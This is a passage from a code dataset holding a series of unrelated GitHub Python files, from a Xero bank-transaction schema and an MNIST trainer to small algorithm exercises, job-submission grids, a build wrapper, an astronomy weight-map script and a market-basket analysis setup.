row[\"BatchPayment\"].get(\"UpdatedDateUTC\"),\n \"IsReconciled\": row[\"BatchPayment\"].get(\"IsReconciled\"),\n }\n if row.get(\"BatchPayment\")\n else {},\n \"Type\": row.get(\"Type\"),\n \"Reference\": row.get(\"Reference\"),\n \"IsReconciled\": row.get(\"IsReconciled\"),\n }\n for row in rows\n ],\n schema=[\n {\n \"name\": \"Contact\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\"name\": \"ContactID\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"DateString\", \"type\": \"TIMESTAMP\"},\n {\"name\": \"Status\", 
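# e.g. AUTHORISED or DELETED in Xero\n            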
\"type\": \"STRING\"},\n {\"name\": \"LineAmountTypes\", \"type\": \"STRING\"},\n {\n \"name\": \"LineItems\",\n \"type\": \"RECORD\",\n \"mode\": \"REPEATED\",\n \"fields\": [\n {\"name\": \"Description\", \"type\": \"STRING\"},\n {\"name\": \"UnitAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"TaxType\", \"type\": \"STRING\"},\n {\"name\": \"TaxAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"LineAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"AccountCode\", \"type\": \"STRING\"},\n {\"name\": \"Quantity\", \"type\": \"NUMERIC\"},\n {\"name\": \"LineItemID\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"SubTotal\", \"type\": \"NUMERIC\"},\n {\"name\": \"TotalTax\", \"type\": \"NUMERIC\"},\n {\"name\": \"Total\", \"type\": \"NUMERIC\"},\n {\"name\": \"UpdatedDateUTC\", \"type\": \"TIMESTAMP\"},\n {\"name\": \"CurrencyCode\", \"type\": \"STRING\"},\n {\"name\": \"BankTransactionID\", \"type\": \"STRING\"},\n {\n \"name\": \"BankAccount\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\"name\": \"AccountID\", \"type\": \"STRING\"},\n {\"name\": \"Code\", \"type\": \"STRING\"},\n {\"name\": \"Name\", \"type\": \"STRING\"},\n ],\n },\n {\n \"name\": \"BatchPayment\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\n \"name\": \"Account\",\n \"type\": \"RECORD\",\n \"fields\": [\n {\"name\": \"AccountID\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"BatchPaymentID\", \"type\": \"STRING\"},\n {\"name\": \"Date\", \"type\": \"STRING\"},\n {\"name\": \"Type\", \"type\": \"STRING\"},\n {\"name\": \"Status\", \"type\": \"STRING\"},\n {\"name\": \"TotalAmount\", \"type\": \"NUMERIC\"},\n {\"name\": \"UpdatedDateUTC\", \"type\": \"STRING\"},\n {\"name\": \"IsReconciled\", \"type\": \"STRING\"},\n ],\n },\n {\"name\": \"Type\", \"type\": \"STRING\"},\n {\"name\": \"Reference\", \"type\": \"STRING\"},\n {\"name\": \"IsReconciled\", \"type\": \"STRING\"},\n ],\n id_key=\"BankTransactionID\",\n)\n","repo_name":"hieumdd/dolfin-blue-xero","sub_path":"xero/pipeline/bank_transactions.py","file_name":"bank_transactions.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12478338355","text":"import numpy as np\r\nimport pandas as pd\r\nfrom modules import mnistNN\r\nimport matplotlib.pyplot as plt\r\nfrom PIL import Image\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torchvision.transforms as T\r\nimport torch.optim as optim\r\n\r\nn_epochs = 3\r\nbatch_size_train = 60\r\nbatch_size_test = 1000\r\nlearning_rate = 0.001\r\nmomentum = 0.9\r\nlog_interval = 10\r\n\r\nrandom_seed = 1\r\ntorch.manual_seed(random_seed)\r\n\r\ntrain_data = pd.read_csv('mnist/mnist_train.csv')\r\nrow, colm = train_data.shape\r\nsample_data = train_data.sample(frac=1)\r\n\r\ntrain_label = torch.tensor(sample_data[\"label\"]).reshape(int(row/batch_size_train),batch_size_train,1).cuda()\r\nprint(train_label.shape)\r\ntrain_image = torch.tensor(sample_data[train_data.columns[1:]].to_numpy())\r\n\r\ntest_data = pd.read_csv('mnist/mnist_test.csv')\r\nrow, colm = test_data.shape\r\nsample_data = test_data.sample(frac=1)\r\n\r\ntest_label = torch.tensor(sample_data[\"label\"]).reshape(int(row/batch_size_test),batch_size_test,1).cuda()\r\ntest_image = torch.tensor(sample_data[train_data.columns[1:]].to_numpy())\r\n\r\nmnist = mnistNN(1,320,10,10,20,5).cuda()\r\nprint(mnist)\r\nparams = list(mnist.parameters())\r\nprint(len(params))\r\nprint(params[0].size())\r\n\r\ntrain_loader = 
train_image.reshape(int(len(train_image)/batch_size_train),batch_size_train,1,28,28).type(torch.float).cuda()\r\ntest_loader = test_image.reshape(int(len(test_image)/batch_size_test),batch_size_test,1,28,28).type(torch.float).cuda()\r\n\r\nprint(train_loader.shape)\r\nprint(train_loader[0].shape)\r\n\r\noutput = mnist(train_loader[0])\r\n\r\n#img = F.interpolate(img, size=32)\r\n\r\nprint(output)\r\n\r\ncriterion = nn.CrossEntropyLoss()\r\noptimizer = optim.SGD(mnist.parameters(), lr=0.001, momentum=0.9)\r\n\r\ntrain_losses = []\r\ntrain_counter = []\r\ntest_losses = []\r\ntest_counter = [i*len(train_image) for i in range(n_epochs + 1)]\r\n\r\ndef train(epoch):\r\n mnist.train()\r\n for batch_idx, data in enumerate(train_loader):\r\n optimizer.zero_grad()\r\n target = train_label[batch_idx].flatten()\r\n output = mnist(data)\r\n loss = F.nll_loss(output, target)\r\n loss.backward()\r\n optimizer.step()\r\n if batch_idx % log_interval == 0:\r\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\r\n epoch, batch_idx * len(data) , len(train_image),\r\n 100. * batch_idx / len(train_loader), loss.item(),))\r\n train_losses.append(loss.item())\r\n train_counter.append((batch_idx*60)+((epoch-1)*len(train_loader)))\r\n torch.save(mnist.state_dict(), 'results/model.pth')\r\n torch.save(optimizer.state_dict(), 'results/optimizer.pth')\r\n\r\n\r\ndef test():\r\n mnist.eval()\r\n test_loss = 0\r\n correct = 0\r\n with torch.no_grad():\r\n for batch_idx, data in enumerate(test_loader):\r\n output = mnist(data)\r\n target = test_label[batch_idx].flatten()\r\n test_loss += F.nll_loss(output, target, size_average=False).item()\r\n\r\n pred = output.data.max(1, keepdim=True)[1]\r\n correct += pred.eq(target.data.view_as(pred)).sum()\r\n \r\n test_loss /= len(test_image)\r\n test_losses.append(test_loss)\r\n print('\\nTest set: Avg. loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\r\n test_loss, correct, len(test_image), 100. 
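# accuracy as a percentage\r\n        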
* correct / len(test_image)\r\n ))\r\n\r\ntest()\r\nfor epoch in range(1, n_epochs + 1):\r\n train(epoch)\r\n test()","repo_name":"nctran108/Hand_writing_ML","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10898264698","text":"# REVISE\n# Given an unsorted array of non-negative integers, find a continuous sub-array which adds to a given number.\n# Ex: Input: arr[] = {1, 4, 20, 3, 10, 5}, sum = 33\n# Output: Sum found between indexes 2 and 4\ndef targetContiguousSubArray(arr, target):\n n = len(arr)\n start, end = 0, 0\n i = 1\n sum = arr[0]\n\n while n > i > start:\n if sum == target:\n end = i - 1\n break\n if sum < target:\n sum += arr[i]\n i += 1\n if sum > target:\n sum -= arr[start]\n start += 1\n if end == 0:\n print(\"There is no such subarray\")\n else:\n print(\"Target sum of \" + str(target) + \" occurs between: \" + str(start) + \" and \" + str(end) + \" indices\")\n\n\n# Time complexity = O(n)\n# Space complexity = O(1)\ntargetContiguousSubArray([1, 4, 20, 3, 10, 5], 33)\ntargetContiguousSubArray([1, 4, 20, 3, -3, 13], 33)\ntargetContiguousSubArray([1, 4, 0, 0, 0], 33)\ntargetContiguousSubArray([35, 35, 35, 35, 35], 33)\ntargetContiguousSubArray([1, 4, 0, 0, 3, 10, 5], 7)\ntargetContiguousSubArray([1, 4], 0)\n\n\n# ------------------------------------------------------------------\n\n# Including negative numbers:\n\ndef targetContiguousSubArray_negNumbers(arr, target):\n n = len(arr)\n curr_sum = 0\n hashmap = {}\n for i in range(0, n):\n curr_sum += arr[i]\n\n if curr_sum == target:\n print(\"The target sum of \" + str(target) + \" is between 0 and \" + str(i))\n return\n if curr_sum - target in hashmap:\n print(\"Sum found between: \", hashmap[curr_sum - target] + 1, \"to\", i)\n return\n hashmap[curr_sum] = i\n\n # If we reached here, then there is no subarray\n print(\"No sub-array with give sum exists\")\n\n#targetContiguousSubArray_negNumbers([0,2,-2,-20,10], -10)\n#targetContiguousSubArray_negNumbers([3,4,7,2,-3,1,4,2], 7)\ntargetContiguousSubArray_negNumbers([3,0,1,2,-3,1,4,2], 7)\n","repo_name":"snagari-coder/Data_Structure_Algorithms","sub_path":"Arrays/subArraySumMatchingTarget.py","file_name":"subArraySumMatchingTarget.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1694453796","text":"from fastmri_recon.evaluate.scripts.postprocess_eval import evaluate_vnet_postproc\n# from fastmri_recon.evaluate.scripts.xpdnet_inference import xpdnet_inference\nfrom fastmri_recon.models.subclassed_models.denoisers.proposed_params import get_model_specs\nfrom fastmri_recon.training_scripts.postprocess_train import train_vnet_postproc\n\nfrom jean_zay.submitit.general_submissions import train_eval_grid, eval_grid, infer_grid\n\n\njob_name = 'post_process'\nrun_ids = {\n 4: 'xpdnet_sense__af4_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n 8: 'xpdnet_sense__af8_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n}\nloss = 'compound_mssim'\nbrain = False\nlr = 1e-4\nn_samples = None\nn_epochs = 190\nuse_mixed_precision = False\nbase_n_filters = 4\nn_scales = 3\nnon_linearity = 'lrelu'\n\nparameter_grid = [\n dict(\n original_run_id=run_ids[8],\n brain=brain,\n n_epochs=n_epochs,\n n_samples=n_samples,\n af=8,\n loss=loss,\n lr=lr,\n use_mixed_precision=use_mixed_precision,\n base_n_filters=base_n_filters,\n n_scales=n_scales,\n 
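# shared post-processing network hyperparameters for both acceleration factors\n        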
non_linearity=non_linearity,\n )\n] + [\n dict(\n original_run_id=run_ids[4],\n brain=brain,\n n_epochs=n_epochs,\n n_samples=n_samples,\n af=4,\n loss=loss,\n lr=lr,\n use_mixed_precision=use_mixed_precision,\n base_n_filters=base_n_filters,\n n_scales=n_scales,\n non_linearity=non_linearity,\n )\n]\n\neval_results, run_ids = train_eval_grid(\n# run_ids = [\n# 'xpdnet_sense__af8_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n# 'xpdnet_sense__af4_compound_mssim_rf_smb_MWCNNmedium_1606491318',\n# ]\n\n# eval_results = eval_grid(\n job_name,\n train_vnet_postproc,\n evaluate_vnet_postproc,\n parameter_grid,\n # run_ids=run_ids,\n n_samples_eval=50,\n timeout_train=100,\n n_gpus_train=1,\n timeout_eval=10,\n n_gpus_eval=1,\n # n_samples=100,\n # timeout=10,\n # n_gpus=1,\n to_grid=False,\n return_run_ids=True,\n params_to_ignore=['use_mixed_precision']\n)\n\nprint(eval_results)\n\n# infer_grid(\n# job_name,\n# xpdnet_inference,\n# parameter_grid,\n# run_ids=run_ids,\n# timeout=10,\n# n_gpus=4,\n# to_grid=False,\n# params_to_ignore=['mask_type', 'multicoil'],\n# )\n","repo_name":"zaccharieramzi/submission-scripts","sub_path":"jean_zay/submitit/fastmri_reproducible_benchmark/xpdnet_multicoil/postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"17214026864","text":"class Solution:\n def searchMatrix(self, matrix, target):\n \"\"\"\n O(log(m) + log(n)) time algorithm where m is the # rows in the matrix, n is the # columns in the matrix, basic idea is use binary search to locate where the target should be, and then do binary search on that row to find where the target is\n \"\"\"\n if not matrix or not matrix[0]:\n return False\n l_r, l_c = 0, 0\n r_r, r_c = len(matrix) - 1, len(matrix[0]) - 1\n \n while l_r < r_r:\n m = (l_r + r_r) // 2\n if matrix[m][0] > target:\n r_r = m - 1\n else:\n if matrix[m][-1] < target:\n l_r = m + 1\n else:\n r_r = m\n while l_c <= r_c:\n m = (l_c + r_c) // 2\n if matrix[l_r][m] > target:\n r_c = m - 1\n elif matrix[l_r][m] < target:\n l_c = m + 1\n else:\n return True\n \n return False\n ","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/74_SearchA2DMatrix.py","file_name":"74_SearchA2DMatrix.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71458441127","text":"print(\"-----MENU DRIVEN CODE-----\")\r\n\r\nprint(\"1:\",\"CHECK WHETHER NUMBER IS PALINDROME NUMBER OR NOT\")\r\nprint(\"2:\",\"LOGIN VALIDATION \")\r\nprint(\"3:\",\"STUDENT DISCPUNT: \")\r\nch=int(input(\"ENTER YOPUR CHOICE: \"))\r\n \r\n\r\nif(ch==1):\r\n num=int(input(\"Enter number to check for palindrome:\")) \r\n rev=0\r\n temp=num\r\n rev=rev*10+num%10\r\n num=num//10\r\n rev=rev*10+num%10\r\n num=num//10\r\n rev=rev*10+num%10\r\n num=num//10\r\n if(rev==temp):\r\n print(temp,\"is palindrome\")\r\n else:\r\n print(temp,\"is not palindrome\")\r\nelif(ch==2):\r\n\r\n import random\r\n user=input(\"enter username:\")\r\n passw=input(\"enter password :\")\r\n otp=random.randint(1000,9999)\r\n if(user==\"abc\")and(passw==\"123\"):\r\n utp=otp\r\n print(\"otp is :\",utp)\r\n print(\"login succesful\")\r\n else:\r\n print(\"login denied\")\r\nelif(ch==3):\r\n p=input(\"are u a student (y/n) :\")\r\n amt=float(input(\"enter the amount :\"))\r\n if(p==\"y\" or p==\"Y\"):\r\n if(amt>=2000):\r\n discount=amt*40/100\r\n else:\r\n discount=amt*8/100 
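# students: 8% off when the amount is under 2000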
\r\n else:\r\n if(amt>=4000):\r\n discount=amt*25/100 \r\n else:\r\n discount=amt*3/100 \r\n\r\n final=amt-discount\r\n print(\"your total amount is: \",amt)\r\n print(\"your discount is:\",discount)\r\n print(\"you pay :\",final) \r\nelse:\r\n print(\"INVALID CHOICE\")\r\nprint(\"----END OF MENU DRIVEN CODE-----\") \r\n","repo_name":"affankhan21/python","sub_path":"menudriven1.py","file_name":"menudriven1.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42147733698","text":"import subprocess, os\r\n\r\n# constants with global scope\r\nINPUT = \"--input\"\r\nOUTPUT = \"--output\"\r\nFILTERS = \"--filters\"\r\nSUPPPLEMENTS = \"--supplements\"\r\nJAR_DIRECTORY = \"target\"\r\nJAR_NAME = \"report-engine.jar\"\r\n\r\ndef build_jar():\r\n should_package = input(\"\\nBuild \" + JAR_NAME + \" file from src (Y/N) ? \")\r\n # check if jar is to be built \r\n if len(should_package) != 0 and (should_package[0] == 'Y' or should_package[0] == 'y'): \r\n # define build commands for maven \r\n mvn_cmd = ['mvn', 'clean', 'package']\r\n print(\"\\nBuilding \" + JAR_NAME + \" from src using command:\\n\" + ' '.join(mvn_cmd) + '\\n')\r\n # build jar using maven through an external process spawned from python\r\n mvn_process = subprocess.Popen(mvn_cmd, shell=True)\r\n mvn_process.wait()\r\n return mvn_process.returncode\r\n else:\r\n return None\r\n \r\ndef execute_jar(app_cmd_args):\r\n should_run = input(\"\\nRun \" + JAR_NAME + \" file from target (Y/N) ? \")\r\n # check if jar is to be run \r\n if len(should_run) != 0 and (should_run[0] == 'Y' or should_run[0] == 'y'): \r\n # form jar file path based on underlying os\r\n jar_location = os.path.join(JAR_DIRECTORY,JAR_NAME)\r\n # define commands for executing .jar file using java\r\n jar_cmd = ['java', '-jar', jar_location]\r\n # parse arguments\r\n for key,value in app_cmd_args.items():\r\n jar_cmd.append(key + '=' + value)\r\n print(\"\\nExecuting \" + JAR_NAME + \" using command: \\n\" + ' '.join(jar_cmd) + '\\n')\r\n # execute jar using java through an external process spawned from python\r\n jar_process = subprocess.Popen(jar_cmd, shell=True)\r\n jar_process.wait()\r\n return jar_process.returncode;\r\n else:\r\n return None\r\n \r\ndef main():\r\n # input from user through stdin\r\n input_path = input(\"Enter the directory path containing profiles to be parsed (--input): \")\r\n output_path = input(\"Enter the directory path where reports will be dumped (--output): \")\r\n filters = input(\"Profile properties for which filtered reports will be generated (--filters optional): \")\r\n supplements = input(\"Profile properties for which supplementary reports will be generated (--supplements optional): \")\r\n \r\n # format arguments\r\n app_cmd_args = dict([(INPUT,input_path)])\r\n \r\n # validate optional arguments\r\n if len(filters) != 0:\r\n app_cmd_args[FILTERS] = filters\r\n if len(output_path) != 0:\r\n app_cmd_args[OUTPUT] = output_path\r\n if len(supplements) != 0:\r\n app_cmd_args[SUPPPLEMENTS] = supplements\r\n \r\n # validate arguments\r\n if len(app_cmd_args.get(INPUT)) == 0:\r\n print(\"\\n\" + INPUT + \" option is mandatory! 
Please re-run the cli_wrapper.py script\\n\")\r\n else :\r\n # argument validated successfully\r\n mvn_exit_code = build_jar()\r\n # execute .jar file only if maven build is successful\r\n print(\"\\nMaven exit code: \" + str(mvn_exit_code)) \r\n if mvn_exit_code == 0 or mvn_exit_code == None:\r\n jar_exit_code = execute_jar(app_cmd_args)\r\n print(\"\\nJava exit code: \" + str(jar_exit_code))\r\n print('\\nReport engine terminated!')\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"anirbandas18/report-engine","sub_path":"cli_wrapper.py","file_name":"cli_wrapper.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21151436352","text":"#! /usr/bin/env python3\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nfrom scipy import stats,ndimage\nfrom astropy.coordinates import SkyCoord\nfrom scipy.interpolate import interp2d, RectBivariateSpline, interpn, griddata\nfrom argparse import ArgumentParser\n\ndef sigmoid(x, ref_x):\n return 1. / (1. + np.exp(-(x-ref_x)))\n\ndef create_sigweight(infits):\n\n img_fits = fits.open(infits)\n img_shape = img_fits[0].data.shape\n valid_mask = np.isfinite(img_fits[0].data)\n step = 50\n y, x = np.indices([s//step + 2 for s in img_fits[0].data.shape], dtype=np.int32)\n\n x_grid = np.clip(x*step, None, img_fits[0].data.shape[1]-1)\n y_grid = np.clip(y*step, None, img_fits[0].data.shape[0]-1)\n\n print('Image shape: ', img_shape)\n print('Max Indicies:', np.max(y_grid), np.max(x_grid))\n print('Min Indicies:', np.min(y_grid), np.min(x_grid))\n\n\n keep = valid_mask[y_grid.flatten(), x_grid.flatten()].reshape(y_grid.shape)\n # keep = np.ones_like(y_sparse)\n \n x_valid = x_grid[keep]\n y_valid = y_grid[keep]\n\n\n wcs = WCS(img_fits[0].header)\n\n sky_pos_grid = wcs.all_pix2world(x_grid, y_grid, 0)\n sky_pos = wcs.all_pix2world(x_valid, y_valid, 0)\n\n max_y = np.max(sky_pos[1])\n min_y = np.min(sky_pos[1])\n\n mask = sky_pos[1] > (max_y - 10)\n\n points = [(x_grid, y_grid, sky_pos_grid), (x_valid, y_valid, sky_pos)]\n\n for (xp, yp, sp) in points:\n\n print('Plotting sky_pos sigma')\n sig_col = np.max(\n (sigmoid(sp[1], max_y-4),\n 1-sigmoid(sp[1], min_y+4)),\n axis=0\n ).astype(np.float16)\n print('Finished sigmoid')\n print('Finished')\n\n sp = sky_pos_grid\n xp = np.array(x_grid).astype(np.int32)\n yp = np.array(y_grid).astype(np.int32)\n\n sig_col = np.max(\n (sigmoid(sp[1], max_y-4),\n 1-sigmoid(sp[1], min_y+4)),\n axis=0\n ).astype(np.float16)\n\n\n print(xp.shape, yp.shape, sig_col.shape)\n\n x_lin = np.arange(img_shape[1], dtype=np.int32)\n y_lin = np.arange(img_shape[0], dtype=np.int32)\n\n xx, yy = np.meshgrid(x_lin, y_lin)\n\n print(xx.shape, xx.dtype)\n\n stripes = 200\n strides = img_shape[1] // stripes\n\n sp = sky_pos_grid\n xp = np.array(x_grid).astype(np.int32)\n yp = np.array(y_grid).astype(np.int32)\n\n sig_col = np.max(\n (sigmoid(sp[1], max_y-4),\n 1-sigmoid(sp[1], min_y+4)),\n axis=0\n ).astype(np.float16)\n\n results = []\n i=0\n while i < (img_shape[1]):\n x_lin = np.arange(img_shape[0], dtype=np.int32)\n maxy= min((i+strides),img_shape[1])\n y_lin = np.arange(\n i,maxy,\n dtype=np.int32)\n print(x_lin.max(), y_lin.max())\n yy, xx = np.meshgrid(y_lin, x_lin)\n\n\n print('interpolating')\n d = griddata(\n (xp.flatten(), yp.flatten()),\n sig_col.flatten(),\n (yy, xx),\n ).astype(np.float32)\n print(xx.shape, xx.dtype, d.dtype)\n\n results.append(d)\n if i+strides >= 
img_shape[1]:\n            i = img_shape[1]\n        else:\n            i+=strides\n\n\n    dd = np.hstack(results)\n\n    dd[~valid_mask] = np.nan\n\n    print(dd.shape, dd.dtype)\n\n\n    ddd=1-dd\n\n    return dd, ddd\n\ndef create_weightmap(sigmoidweight,rms):\n\n    rms_fits = fits.open(rms)\n    valid_mask = np.isfinite(rms_fits[0].data)\n    imshape_zeros = np.zeros(valid_mask.shape)\n    imshape_zeros[valid_mask] = 1.\n\n    # the RMS clipping below relies on edgemask, so the whole block only runs when --mask is set\n    if args.do_mask is True:\n        dist_to_edge = ndimage.distance_transform_edt(imshape_zeros,sampling=[1000,1000])\n        edgemask = dist_to_edge <= np.nanmax(dist_to_edge)/5\n\n        lowercut = np.nanquantile(rms_fits[0].data, 0.45)\n        uppercut = np.nanquantile(rms_fits[0].data,0.95)\n        rms_mask = rms_fits[0].data <= lowercut\n        rms_mask2 = rms_fits[0].data >= uppercut\n\n        combined_rms = np.logical_or(rms_mask,rms_mask2)\n        combined_mask = np.logical_and(combined_rms,edgemask)\n        rms_fits[0].data[combined_mask] = np.nan\n\n    weightmap = sigmoidweight * (1/(rms_fits[0].data**2))\n\n    return weightmap\n\n\nif __name__ == \"__main__\":\n    parser = ArgumentParser(\n        description=\"create a weighting for a drift night based on a sigmoid weighting, will output the fits image for weighting that should be multiplied by the rms/weights \"\n    )\n    parser.add_argument(\n        \"infits\",\n        help=\"The input image to use for pixels and sky wcs\",\n    )\n    parser.add_argument(\n        \"rmsfits\",\n        help=\"RMS map to use the sigmoid weighting on and produce final weightmap that's input for swarp\"\n    )\n    parser.add_argument(\n        \"outfits\",\n        help=\"Outfile to save the map to\"\n    )\n    parser.add_argument(\n        \"--mask\",\n        action=\"store_true\",\n        default=False,\n        dest=\"do_mask\",\n        help=\"Add a mask for the edges of the weightmap\"\n    )\n    args = parser.parse_args()\n    dd, ddd = create_sigweight(args.infits)\n\n    weightmap = create_weightmap(ddd, args.rmsfits)\n    fits.writeto(args.outfits, weightmap, overwrite=True)\n","repo_name":"GLEAM-X/GLEAM-X-pipeline","sub_path":"gleam_x/bin/sigmoid_edge_weight.py","file_name":"sigmoid_edge_weight.py","file_ext":"py","file_size_in_byte":5214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74910182246","text":"# Bubble sort \n\ndef bubbleSort(array):\n    \n    for i in range(len(array)):\n\n        for j in range(0, len(array) - i - 1):\n\n            # Using < to sort in descending order\n            # committed error, now sorting in descending order instead of ascending order\n            if array[j] < array[j + 1]:\n\n                temp = array[j]\n                array[j] = array[j+1]\n                array[j+1] = temp\n\n\nprint (\"\\033[1;33;40m.. • ☆ . ° .• °:. *₊° .☆. . • ☆ . ° .• °:. *₊° .☆.. 
• ☆ .\\033[1;33;40m\\n\") \ndata = [ 2, 27, 40, 7, 13, 66, 1, 31, 41, 24 ] \nbubbleSort(data)\nprint(' \\033[1;37;40mSorted Array in Descending Order using Bubble Sort:\\033[1;37;40m\\n')\nprint(\" \\033[0;37;41m\",data,\"\\033[0;37;40m\\n\")\n","repo_name":"jezelldomer/Array-Sorting","sub_path":"bubble-sort.py","file_name":"bubble-sort.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30147560374","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nfrom __future__ import unicode_literals\nimport tkinter as tk\nimport youtube_dl\n\nroot= tk.Tk()\nroot.title('Playlist Downloader')\ncanvas1 = tk.Canvas(root, width = 400, height = 300)\ncanvas1.pack()\n\nentry1 = tk.Entry (root) \ncanvas1.create_window(200, 140, window=entry1)\n\ndef download_playlist(): \n    x1 = entry1.get()\n    \n    def my_hook(d):\n        if d['status'] == 'finished':\n            print('Done downloading, now converting ...')\n\n    ydl_opts = {\n        'format': 'bestaudio/best', \n        'outtmpl': '%(title)s.%(ext)s', \n        'noplaylist' : False, \n        'progress_hooks': [my_hook], \n        'audiotformat': 'mp3',\n        'preferredquality': '320',\n        'postprocessors': [{\n            'key': 'FFmpegExtractAudio',\n            'preferredcodec': 'mp3',\n            'preferredquality': '320',\n        }]\n    }\n\n    with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n        ydl.download([x1])\n    \nbutton1 = tk.Button(text='Download playlist', command=download_playlist)\ncanvas1.create_window(200, 180, window=button1)\n\nroot.mainloop()\n\n","repo_name":"haker88/PlaylistDownloader","sub_path":"PlaylistDownloader.py","file_name":"PlaylistDownloader.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"15974184344","text":"#!/usr/bin/env python\n\n# Built-in\nimport logging\nfrom pathlib import Path\n\n# ML\nimport torch\n\n# Config and loggers\nimport hydra\nfrom omegaconf import DictConfig\nfrom hydra.utils import instantiate\nimport wandb\n\n# Own\nfrom helpers.utils import Scaler\n\n\n@hydra.main(\n    version_base=None,\n    config_path=(Path.cwd() / \"config\").as_posix(),\n    config_name=\"config\",\n)\ndef main(cfg: DictConfig) -> None:\n    # Initiate logger\n    init_plot(cfg.log.style)\n    cfg.log.level = logging.getLevelName(cfg.log.level)\n    cfg.log.global_level = logging.getLevelName(cfg.log.global_level)\n    logger = logging.getLogger(\"Sweeps\")\n    logger.info(\"Sweeps logs will be saved at %s\", Path.cwd())\n    # Choosing a device\n    if cfg.device == \"auto\":\n        cfg.device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n    # Training\n    # Initiate dataset\n    train_dataset = instantiate(cfg.dataset, mode=\"train\")\n    val_dataset = instantiate(cfg.dataset, mode=\"val\")\n    # Initiate the scaler\n    scaler = Scaler(*train_dataset.get_scaler_info)\n    # Initiate the model\n    model = instantiate(cfg.model, degrees=train_dataset.degrees)\n    # Initiate the estimator model\n    e_model = instantiate(\n        cfg.estimator,\n        embedding_dict={\n            \"time\": 24 * 7 * 12,\n            \"day\": 7,\n            \"node\": train_dataset.node,\n            \"degree\": train_dataset.degrees_max,\n        },\n        degrees=train_dataset.degrees,\n    )\n    # Setup a logger\n    wandb.init(\n        project=cfg.log.project,\n        settings=wandb.Settings(start_method=\"thread\"),\n    )\n    # Initiate trainer\n    trainer = instantiate(\n        cfg.trainer, model=model, e_model=e_model, scaler=scaler\n    )\n    # Train\n    trainer.train(train_dataset.get_data_loader(), val_dataset.get_data_loader())\n\n\nif __name__ == \"__main__\":\n    # run sweep with wandb sweep 
./config/sweepers/[YOUR SWEEP OF CHOICE]\n    # Then follow the wandb instructions\n    main()\n","repo_name":"Mouradost/STGM","sub_path":"src/sweeps.py","file_name":"sweeps.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"53"} +{"seq_id":"16400040887","text":"from collections import defaultdict\ndata_stream = \"\"\nwith open('inp1.txt', 'r') as file:\n    data = file.readlines()\n    data_stream = data[0].strip()\nseen = defaultdict(int)\nunique_chars = 0\nSTREAM_LENGTH = 14 # 4\nfor i, c in enumerate(data_stream):\n    if unique_chars == STREAM_LENGTH:\n        print(i)\n        break\n    if i >= STREAM_LENGTH:\n        removed_char = data_stream[i-STREAM_LENGTH]\n        seen[removed_char] -= 1\n        if seen[removed_char] == 0:\n            unique_chars -= 1\n    if seen[c] == 0:\n        unique_chars += 1\n    seen[c] += 1","repo_name":"ayubharis/advent-of-code-2022","sub_path":"06/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22077059928","text":"########################################################################\r\n# ASSOCIATION RULES PROJECT WITH online_retail_2 DATA\r\n########################################################################\r\n\r\n##################################\r\n# Preparing Data\r\n##################################\r\n# !pip install mlxtend\r\nimport pandas as pd\r\npd.set_option('display.max_columns', None)\r\n# pd.set_option('display.max_rows', None)\r\npd.set_option('display.width', 500)\r\nimport datetime as dt\r\n# ensures the output is displayed on a single line\r\npd.set_option('display.expand_frame_repr', False)\r\nfrom mlxtend.frequent_patterns import apriori, association_rules\r\n\r\ndf_ = pd.read_excel(\"datasets/online_retail_II.xlsx\",\r\n                    sheet_name=\"Year 2010-2011\")\r\n\r\ndf = df_.copy()\r\n\r\ndf.head()\r\ndf.info()\r\ndf.isnull().sum()\r\n\r\n\r\ndf = df.dropna()\r\n\r\ndf = df[df[\"StockCode\"] != 